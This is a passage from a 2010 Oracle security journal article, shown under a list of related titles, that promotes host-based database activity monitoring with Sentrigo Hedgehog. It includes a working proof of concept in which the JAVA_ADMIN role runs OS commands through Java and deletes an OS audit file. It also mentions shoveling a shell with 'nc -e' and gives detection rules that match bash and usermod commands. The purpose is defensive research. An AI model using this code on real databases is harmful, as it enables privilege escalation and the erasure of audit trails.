Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems

Similar documents
An Oracle White Paper August Oracle Database Auditing: Performance Guidelines

Paul M. Wright Last updated Sunday 25 th February For

Advantages of Server-side Database Auditing. By SoftTree Technologies, Inc.

Securing Data in Oracle Database 12c

Secret Server Qualys Integration Guide

Microsoft SQL Server for Oracle DBAs Course 40045; 4 Days, Instructor-led

Copyright 2013, Oracle and/or its affiliates. All rights reserved.

Oracle vs. SQL Server. Simon Pane & Steve Recsky First4 Database Partners Inc. September 20, 2012

MySQL Security: Best Practices

Oracle USF

Guardium Change Auditing System (CAS)

Data Security: Strategy and Tactics for Success

D61830GC30. MySQL for Developers. Summary. Introduction. Prerequisites. At Course completion After completing this course, students will be able to:

Data Replication in Privileged Credential Vaults

An Oracle White Paper May Oracle Audit Vault and Database Firewall 12.1 Sizing Best Practices

Penetration Testing: Advanced Oracle Exploitation Page 1

The Ultimate Remote Database Administration Tool for Oracle, SQL Server and DB2 UDB

Oracle Database 11g: Security. What you will learn:

Making Database Security an IT Security Priority

The Need for Real-Time Database Monitoring, Auditing and Intrusion Prevention

Data Collection and Analysis: Get End-to-End Security with Cisco Connected Analytics for Network Deployment

Edit system files. Delete file. ObserveIT Highlights. Change OS settings. Change password. See exactly what users are doing!

Database Security, Virtualization and Cloud Computing

MyOra 3.0. User Guide. SQL Tool for Oracle. Jayam Systems, LLC

Oracle Database Security. Paul Needham Senior Director, Product Management Database Security

ObserveIT User Activity Monitoring software meets the complex compliance and security challenges related to user activity auditing.

Fixing Common Problems in Data Storage - A Review

Security and Control Issues within Relational Databases

White Paper. McAfee Real-Time Database Monitoring, Auditing, and Intrusion Prevention

RSA Solution Brief. RSA SecurID Authentication in Action: Securing Privileged User Access. RSA Solution Brief

Oracle 11g Database Administration

An Oracle White Paper June Security and the Oracle Database Cloud Service

DIR Contract Number DIR-TSO-2621 Appendix C Pricing Index

Oracle Database 11g: Security Release 2. Course Topics. Introduction to Database Security. Choosing Security Solutions

Automate Your BI Administration to Save Millions with Command Manager and System Manager

Copyright 2012, Oracle and/or its affiliates. All rights reserved.

<Insert Picture Here> Oracle Database Directions Fred Louis Principal Sales Consultant Ohio Valley Region

Rule 4-004M Payment Card Industry (PCI) Monitoring, Logging and Audit (proposed)

Thick Client Application Security

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Oracle Health Sciences Network. 1 Introduction. 1.1 General Security Principles

Database Auditing: Best Practices. Rob Barnes, CISA Director of Security, Risk and Compliance Operations

An Oracle White Paper June High Performance Connectors for Load and Access of Data from Hadoop to Oracle Database

Hedgehog: Host-Based Database Activity Monitoring & Prevention

White Paper. What Auditors Want Database Auditing. 5 Key Questions Auditors Ask During a Database Compliance Audit

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

ORACLE DATABASE SECURITY. Keywords: data security, password administration, Oracle HTTP Server, OracleAS, access control.

Oracle Database 11g: Security

05.0 Application Development

DATABASE SECURITY MECHANISMS AND IMPLEMENTATIONS

Protecting Sensitive Data Reducing Risk with Oracle Database Security

White Paper. Protecting Databases from Unauthorized Activities Using Imperva SecureSphere

Auditing the Security of an SAP HANA Implementation

RSA Authentication Manager 7.1 Security Best Practices Guide. Version 2

An Oracle White Paper May Oracle Database Cloud Service

Cisco Process Orchestrator Installation Guide

Module II. Internet Security. Chapter 7. Intrusion Detection. Web Security: Theory & Applications. School of Software, Sun Yat-sen University

What s New in Centrify DirectAudit 2.0

SQL Server 2008 Designing, Optimizing, and Maintaining a Database Session 1

Best Practices for Database Security

Oracle 1Z0-528 Exam Questions & Answers

Database Security. Oracle Database 12c - New Features and Planning Now

Tagging, Encoding, and Encrypting with RMAN

Workflow Templates Library

Oracle Audit Vault Oracle FLEXCUBE Universal Banking Release [April] [2014]

Upgrading Your SQL Server 2000 Database Administration (DBA) Skills to SQL Server 2008 DBA Skills Course 6317A: Three days; Instructor-Led

APPLICATION COMPLIANCE AUDIT & ENFORCEMENT

An Oracle White Paper July Oracle Primavera Contract Management, Business Intelligence Publisher Edition-Sizing Guide

SQL Databases Course. by Applied Technology Research Center. This course provides training for MySQL, Oracle, SQL Server and PostgreSQL databases.

Oracle Database Security. Nathan Aaron ICTN 4040 Spring 2006

Oracle Database Security

Securing Oracle E-Business Suite in the Cloud

GFI White Paper PCI-DSS compliance and GFI Software products

Larry Wilson Version 1.0 November, University Cyber-security Program Critical Asset Mapping

PCI DSS Best Practices with Snare Enterprise Agents PCI DSS Best Practices with Snare Enterprise Agents

INTRODUCTION ADVANTAGES OF RUNNING ORACLE 11G ON WINDOWS. Edward Whalen, Performance Tuning Corporation

Project Manager 1 Post == Experience years in Project Management in reputed company, Salary Rs.1,20,000/-

Securely maintaining sensitive financial and

Hacking Database for Owning your Data

Oracle Audit in a Nutshell - Database Audit but how?

MyOra 3.5. User Guide. SQL Tool for Oracle. Kris Murthy

Security Event Management. February 7, 2007 (Revision 5)

How To Secure A Database From A Leaky, Unsecured, And Unpatched Server

Microsoft SQL Database Administrator Certification

CimTrak Technical Summary. DETECT All changes across your IT environment. NOTIFY Receive instant notification that a change has occurred

Best Approaches to Database Auditing: Strengths and Weaknesses.

D50323GC20 Oracle Database 11g: Security Release 2

Network- vs. Host-based Intrusion Detection

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Developing Value from Oracle s Audit Vault For Auditors and IT Security Professionals

Frequently Asked Questions. Secure Log Manager. Last Update: 6/25/ Barfield Road Atlanta, GA Tel: Fax:

Foundstone ERS remediation System

ORACLE DATABASE 10G ENTERPRISE EDITION

B database Security - A Case Study

OnCommand Performance Manager 1.1

Transcription:

Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems By Paul M. Wright T he Oracle database has long been used as an effective tool for recording details that can be collated and queried, thus giving the database owner power over that information. However, to date, the Oracle database has not been so good at recording metadata about how that power is used, i.e. the majority of Oracle databases do not have comprehensive auditing enabled to monitor the people that use it, and what audit is enabled is modifiable by the database owner. So ~Who watches the watchmen? or more traditionally ~Quis custodiet ipsos custodes? There are a number of solutions to the problem of monitoring database activity in Oracle. First, Oracle has multiple monitoring solutions from Oracle themselves such as Basic Audit recording to the DB, OS and Syslog. Then, for the more adventurous, there is Audit Vault. These solutions are well-designed solutions that many customers worldwide use effectively. But these solutions all have the same basic weakness: They all run with the privileges of the oracle operating system user on the database server. This means that either a DBA with the oracle OS credentials or a database attacker who can run code as the oracle user can turn off or modify the audit trail. The Oracle security model is meant to protect OS-based audit from DB users, but an Oracle user has a number of ways of accessing the OS from the DB thus making the OS-based audit insecure (see the code example toward the end of this article). Additionally, Oracle s audit mechanisms are known for causing some performance loss making them less useful for comprehensive auditing. What is required is a system to allow comprehensive monitoring of database activity that does not affect performance and cannot be manipulated by a user who has gained the required OS privileges. The most common solution to this requirement has been Network-Based monitoring systems that understand the TNS protocol and record SQL queries over the network in a hardware appliance. The benefit of network monitoring is that it can be done without affecting performance or reliability of the database server. Additionally it can be done without requiring cooperation from the database team. Therefore, it has been easy to implement organizationally. However, there are major drawbacks to the network monitoring model in that most privileged database access is via encrypted SSH connections, which cannot be viewed by the network monitoring appliance. Moreover, network monitoring appliances only see the text of the SQL over the network and rely on pattern matching to alert to unauthorized activity. Thus, network monitoring systems do not understand what effect that SQL will have in the database and cannot identify actual DB objects, only the string in the SQL text. On the other hand, Host-Based monitoring can read SSH d connections and can interpret SQL queries in relation to the actual data model and identify the specific objects, thus alerting more accurately. But the problem with Host-Based monitoring is that it has been more likely to cause both performance and compatibility issues in the DB. Likewise, Host-Based systems need the cooperation of the database team, and this cooperation is difficult to get if it is likely to cause a disruption to the efficient working of the database. What is then required is a Host-Based database monitoring system that is reliable and performant. Given this strong need, it is not surprising to see that a vendor such as Sentrigo Inc., have decided to concentrate on solving this one problem and have applied that along with the author s experience with their Hedgehog database monitoring solution. This product is available as a free fully functional (time-limited) Enterprise Edition product at www.sentrigo.comproductshedgehog-enterprise Sentrigo Hedgehog is a sensor agent that is installed on the database server and attaches in Read-Only mode to the shared memory of the SGA and then sends the results of scanning SQL queries over SSL to the separate Hedgehog server where the alerts are stored. The Hedgehog sensor agent runs as a separate user from oracle on the DB server OS, so the DBA cannot alter it, nor can an attacker running code as the oracle OS user. Hedgehog can read SSH d queries, and because the alerts are sent to a remote log host the DBA cannot modify the alerts. Because Hedgehog reads directly from the DB it is less susceptible to signature bypass techniques, and reduces both false positives and false negatives. Crucially, the performance hit of the sensor can be tuned to be less than one percent of total CPU and memory usage even at times of heavy load. This is done by reducing the sampling frequency of the sensor. For the past year, the author has found this system to be reliable. As well, it has been instrumental in gaining security compliance within the financial services industry. Achieving such transparency of database activity is an important foundation for achieving transparency in the financial sector. Now that we have an overview, now let s get into some of the interesting details. First, what do the performance figures look like on a two node RAC in a Production environment? So that s the typical performance stats, but what does the Hedgehog (HH) Server look like? The STATEMENT keyword used in the rule shown previously pattern matches the SQL as would a network-based system. This can be improved by using the OBJECT keyword as follows: OBJECT= SYS.FINDRICSET The OBJECT rule will only trigger when that actual object such as a table or view is called, not just when any string that contains the FINDRICSET continued on page 24 3rd Qtr 2010 Page 23

Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems continued from page 23 Figure 1 CPU%: Typical usage on Production less than 1% Figure 2: Sentrigo Hedgehog server GUI showing connected sensors Page 24 3rd Qtr 2010

Figure 3: What do the Hedgehog rules looks like? characters is run. This accuracy is especially useful when profiling usage of data by users with the aim of Data Leak Prevention. Consider a table named customers in a schema named main: MAIN.CUSTOMERS A STATEMENT rule matching on the string CUSTOMERS is likely to trigger a million times on all the columns, code and queries that occur in a large warehouse and happen to contain the string CUSTOMERS. However, a rule matching specifically on OBJECT= MAIN.CUSTOMERS results in a small number of accurate alerts even when the prefixing schema is omitted from the query. This cures the biggest headache of Data Leak Protection systems, i.e. wasted time wading through the flood of false positives. For more Scenarios of Sentrigo HH usage please refer to these previous papers: www.oracleforensics.comwordpressindex.php20090710create-user-to-sysdba www.oracleforensics.comwordpressindex.php20081010create-any-directoryto-sysdba A new example of using Sentrigo Hedgehog to secure Oracle can be found in the case of the JAVA_ADMIN Oracle database role. A user holding the JAVA_ADMIN Role will appear to have low privileges: SQL> SELECT * FROM DBA_TAB_PRIVS WHERE GRANTEE='JAVA_ADMIN'; SQL> SELECT * FROM DBA_ROLE_PRIVS WHERE GRANTEE='JAVA_ADMIN'; SQL> SELECT * FROM DBA_SYS_PRIVS WHERE GRANTEE='JAVA_ADMIN'; Java is secure as it is sand boxed, right? Not necessarily so. The following proof of concept shows that the JAVA_ADMIN database Role can be used to act as the oracle OS user, which means that the JAVA_ADMIN Role can modify the audit trail recorded to the OS! The following code ran on this version of the Oracle database: SQL> SELECT * FROM V$VERSION; BANNER --------------------------------------------------------- Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Prod PLSQL Release 10.2.0.3.0 - Production CORE 10.2.0.3.0 Production continued on page 27 3rd Qtr 2010 Page 25

Achieving Security Compliancy and Database Transparency continued from page 25 TNS for Linux: Version 10.2.0.3.0 - Production NLSRTL Version 10.2.0.3.0 Production CREATE USER JAVATEST IDENTIFIED BY JAVATEST; GRANT CREATE PROCEDURE TO JAVATEST; GRANT CREATE SESSION TO JAVATEST; GRANT JAVA_ADMIN TO JAVATEST; CONN JAVATESTJAVATEST; CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED javaproc AS import java.io.*; public class javaproc{public static String Run(String mystring){ try{ Runtime.getRuntime().exec(myString); return("0"); catch (Exception e){ return(e.getmessage()); begin dbms_java.grant_permission( 'JAVATEST','SYS:java.io.FilePermission','<<ALL FILES>>','execute'); begin dbms_java.grant_permission( 'JAVATEST','SYS:java.lang.RuntimePermission','writeFileDesc riptor','*' ); begin dbms_java.grant_permission( 'JAVATEST','SYS:java.lang.RuntimePermission','readFileDescr iptor','*' ); CREATE or REPLACE PROCEDURE javaos(command IN STRING) AS LANGUAGE JAVA NAME 'javaproc.run(java.lang.string)'; SQL> call javaos('touch homeoracletest_java6.txt'); [oracle@dev oracle]$ ls -alt test_java6.txt -rw-r--r-- 1 oracle oinstall 0 Aug 24 20:56 test_java6.txt SQL> call javaos('rm homeoracletest_java6.txt'); Of course the JAVA_ADMIN Role could also be used to change the oracle unix password, shoot an xterm back to a separate host or shovel a shell back using nc -e. (See www.oracleforensics.comwordpressindex.php20090831 java_admin-to-osdba). However, and this is a key point, what the JAVA_ADMIN can NOT do is switch off or modify Sentrigo Hedgehog auditing as it runs as a separate user from oracle! So a Sentrigo Hedgehog rule that would alert to JAVA_ADMIN usage would look like this: Object= dbms_java.grant_permission Rules that would alert to JAVA_ADMIN abuse would look like this: Statement contains usrsbinusermod p or Statement contains xhost Statement contains -e usrbinbash The rules can be made more difficult to bypass by using Regular Expressions capturing the same commands obfuscated by comments or blank spaces, e.g. Statement matches -e\s*usrbinbash This is powerful protection for database systems with security compliancy requirements. For more in-depth knowledge on secure audit trails, please refer to www.oraclesecurity.com and the first book on Database Forensics by Paul M. Wright via Rampant Techpress www.rampant-books.combook_0701_oracle_ forensics.htm About the Author Paul M. Wright is an expert at securing 3-tier Oracle architectures, having a decade of experience, including Pentest Ltd, NGSSoftware, Betfair, Markit Group, and consultancy for financial institutions. This experience includes secure software development, deployment, configuration, monitoring, logging, forensic response and compliancy. Wright has been credited by four Oracle CPUs and authored Oracle Forensics: Security Best Practises. He is published via IOUG SELECT Journal, UKOUG SCENE Journal and has presented his original research at UKOUG, ISACA, RSA, ISSD and SANS. Wright currently holds two OCPs for Development and DBA as well as being a GIAC GSOC, GSE and SANS Instructor for JavaOracle Security. [oracle@dev oracle]$ ls -alt test_java6.txt ls: test_java6.txt: No such file or directory The above PoC commands can be used to delete or modify the OS based audit trail: SQL> call javaos('rm u01apporacleadminorcladumpora_705.aud'); 3rd Qtr 2010 Page 27

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information